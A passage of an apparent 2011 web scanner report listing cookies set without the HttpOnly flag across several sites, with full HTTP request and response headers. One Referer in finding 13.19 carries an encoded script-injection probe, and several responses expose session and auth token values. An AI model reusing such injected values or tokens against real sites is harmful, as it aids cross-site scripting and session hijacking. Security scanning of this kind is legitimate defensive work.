Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=AD61B4917C0B442AD2D923ADADC2675A; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"2226-1280994282000"
Last-Modified: Thu, 05 Aug 2010 07:44:42 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 2226

GIF89a0.0....w..m...........!4m...........W....y....6....w...........e..]M...f.F..BEu.........J.k...v.......T.........B...........jw............m.....e...........I........|8?r...8..`.t........Y.......
...[SNIP]...

13.8. https://support.connexon.com/images/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /images/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/favicon.ico HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=607787AE9CA83B1C07389AEFC2EF256A; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:13 GMT; Path=/
ETag: W/"318-1282158794000"
Last-Modified: Wed, 18 Aug 2010 19:13:14 GMT
Content-Length: 318
Date: Thu, 12 May 2011 01:08:12 GMT
Server: Apache-Coyote/1.1

..............(.......(....... .................................................................................................................wwpwww....|.....................ww|.......|.............
...[SNIP]...

13.9. https://support.connexon.com/images/spacer.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/spacer.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=3E33D7090110A52AF1A2EDAFA1C24EAD; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:10 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:10 GMT
ETag: W/"43-1282158794000"
Last-Modified: Wed, 18 Aug 2010 19:13:14 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 01:08:10 GMT
Server: Apache-Coyote/1.1

GIF89a.............!.......,...........D..;

13.10. https://support.connexon.com/sd/SolutionsHome.sd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /sd/SolutionsHome.sd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sd/SolutionsHome.sd HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.911enable.com/login/index.php

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=270247465902DF59F63589A1CC79528E; Path=/sd
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/sd; Expires=Fri, 13-May-2011 01:08:08 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 13742


<html>
<link type="text/css" rel="stylesheet" href="../style/style.css?aa">
<link type="text/css" rel="stylesheet" href="../style/demo.css">
<link rel="SHORTCUT ICON" hre
...[SNIP]...

13.11. https://support.connexon.com/style/demo.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /style/demo.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/demo.css HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 404 /style/demo.css
Set-Cookie: JSESSIONID=CF1B4E8028A2944A1E644EE9D78DB960; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:09 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 997
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1

<html><head><title>Apache Tomcat/5.0.28 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

13.12. https://support.connexon.com/style/style.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /style/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/style.css?aa HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=AF295E2F29DA2AF72D8D0F33050CAE08; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:12 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:12 GMT
ETag: W/"320710-1282158796000"
Last-Modified: Wed, 18 Aug 2010 19:13:16 GMT
Content-Type: text/css
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:11 GMT
Server: Apache-Coyote/1.1
Content-Length: 320710

/* $Id: style.css,v 1.287 2010/06/11 07:36:28 vijay Exp $ */
@import url("htmlarea.css");
@import url("combo.css");
@import url("common.css");
@import url("menu.css");
@import url("cal_style.css");
...[SNIP]...

13.13. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://support.sprint.com
Path:   /support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547 HTTP/1.1
Host: support.sprint.com
Proxy-Connection: keep-alive
Referer: http://shop2.sprint.com/en/support/faq/wlnp.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: Apache=173.193.214.243.1305161164637776; path=/
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
Set-Cookie: JSESSIONID=E03DE23D7995866D54F37C7F07F26CB3.support4; Path=/
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLFByb2plY3RJbnN0YWxsLzkuMCBbIERQU0xpY2Vuc2UvMCBCMkJMaWNlbnNlLzAgIF0=
cache-control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: RecentlyViewedArticle=case-wh164052-20100420-140547:article_text; Expires=Sat, 11-Jun-2011 00:55:43 GMT; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 65521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml
...[SNIP]...

13.14. http://www.911enable.com/business/contact_specialist.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.911enable.com
Path:   /business/contact_specialist.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/contact_specialist.php?provenance=empty HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/login/index.php
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.5.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=r2burfmm6jqje8vo1bf8orrin2; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:07:16 GMT
Content-Length: 23673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Tem
...[SNIP]...

13.15. http://www.atis.org/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.atis.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.atis.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26119
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASRRCDST=NDEPFBJBICBGPNEIFEPGGFBC; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="stylesheet" href="../css/atis.css">
<meta http-equiv="Content-Type"
...[SNIP]...

13.16. http://www.commpartnersconnect.com/company  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.commpartnersconnect.com
Path:   /company

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /company?number=&command=AJAXlookup&f=json&format=json&jsoncallback=jsonp1305161150243 HTTP/1.1
Host: www.commpartnersconnect.com
Proxy-Connection: keep-alive
Referer: http://www.onwav.com/lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:50:34 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.2.2
Set-Cookie: PHPSESSID=ff8626b16a6dd1021d5cc9da25521ffc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 89
Connection: close
Content-Type: text/html; charset=UTF-8

<p class=pageTitle style="color:red">Unable to get LNP Status - contact Commparnters.</p>

13.17. http://www.job-search-engine.com/keyword/number-portability/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.job-search-engine.com
Path:   /keyword/number-portability/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /keyword/number-portability/ HTTP/1.1
Host: www.job-search-engine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 00:45:54 GMT
Server: CherryPy/3.1.2
Set-Cookie: JUJUSESSIONID=b7da80c1b1571de1738a086cbc20d5e2597a6eea; Path=/
Set-Cookie: jpp=10; Path=/
Set-Cookie: session_id=b7da80c1b1571de1738a086cbc20d5e2597a6eea; expires=Thu, 12 May 2011 01:45:54 GMT; Path=/
Vary: Accept-Encoding
Via: 1.1 www.job-search-engine.com
Connection: keep-alive
Content-Length: 45948


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

13.18. http://www.linkedin.com/companyInsider  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /companyInsider

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /companyInsider?script&useBorder=no HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; __qca=P0-87169230-1303163602430; bcookie="v=1&4d9675db-dcd4-4b34-bfd9-5f98cf2c89da"; __utmz=23068709.1304721517.5.2.utmcsr=socialfollow.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=23068709.2028061763.1303163602.1304000549.1304721517.5; __utmv=23068709.guest

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:8tR8AXa_H87sybQCohL0f5rN4fe7m5AJEEzQz9agYlq3KAZCF6aP-d:1305161207:bd31acd81eafdc11524936bd768546496be4bb6b"; Version=1; Max-Age=1799; Expires=Thu, 12-May-2011 01:16:46 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:8157137445058115307"; Version=1; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 00:46:46 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19964145525d5f4f58455e445a4a42198c;expires=Thu, 12-May-2011 01:18:01 GMT;path=/;httponly
Content-Length: 12412

(function() {

// Set up LinkedIn Global Namespace
if (typeof(LinkedIn) == 'undefined') {
LinkedIn = {};
}

// Utility functions
function $(element) {
return (typeof element == 'string') ?

...[SNIP]...

13.19. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:13:38 GMT
Set-Cookie: SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g;Path=/
Connection: close
Last-Modified: Thu, 12 May 2011 00:13:38 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 18909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...

13.20. http://www.secviz.org/node/89  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.secviz.org
Path:   /node/89

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /node/89 HTTP/1.1
Host: www.secviz.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:56 GMT
Server: Apache/2.2.17
Set-Cookie: SESS511f69598f6d24673b9cd181bd44c360=3679a5a8e5f156807fb4105e9bf204df; expires=Sat, 04-Jun-2011 04:22:16 GMT; path=/; domain=.secviz.org
Last-Modified: Wed, 11 May 2011 22:47:09 GMT
ETag: "13ef58d2264914230329c15df5277159"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 17680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title>The D
...[SNIP]...

13.21. http://www.westcongroup.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.westcongroup.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.westcongroup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:10:25 GMT
Server: Apache/2.2.8 (EL)
Set-Cookie: JSESSIONID=4BD344F3D5761EE1EA0C84F83F989EB1; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 26571


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...

13.22. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;225879025;40290099;m HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.vonage.com/lp/US/afflpdc/?refer_id=AFLGN090801001W1&promo_id=USVONRP2499NSC_WEB&deviceType=VDV21_FREE_UPSELL
Set-Cookie: id=22fba3001601008d|2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 12 May 2011 00:50:28 GMT
Server: GFE/2.0
Content-Type: text/html


13.23. http://anpisolutions.app4.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://anpisolutions.app4.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: anpisolutions.app4.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 498
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=V8Dkeg8vzQEkAAAAODIzNjFhODYtN2M0OS00MGY2LTkzNTItOTk2NjRmMDI4YWIy0; expires=Fri, 11-May-2012 00:46:19 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=16f8b9e2-e345-4500-a8d4-a6d152516a13; domain=anpisolutions.app4.hubspot.com; expires=Tue, 11-May-2021 05:00:00 GMT; path=/; HttpOnly
Date: Thu, 12 May 2011 00:46:19 GMT
Set-Cookie: HUBSPOT95=185668780.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 11620;
var hsWeekEndsIn = 357220;
var hsMonthEndsIn = 1739620;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-11 20:46
...[SNIP]...

13.24. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=662363118&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.redskye911.com%252Fe911_products%252F%26jsref%3Dhttp%253A%252F%252Fwww.redskye911.com%252F%26rnd%3D1305162438995&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
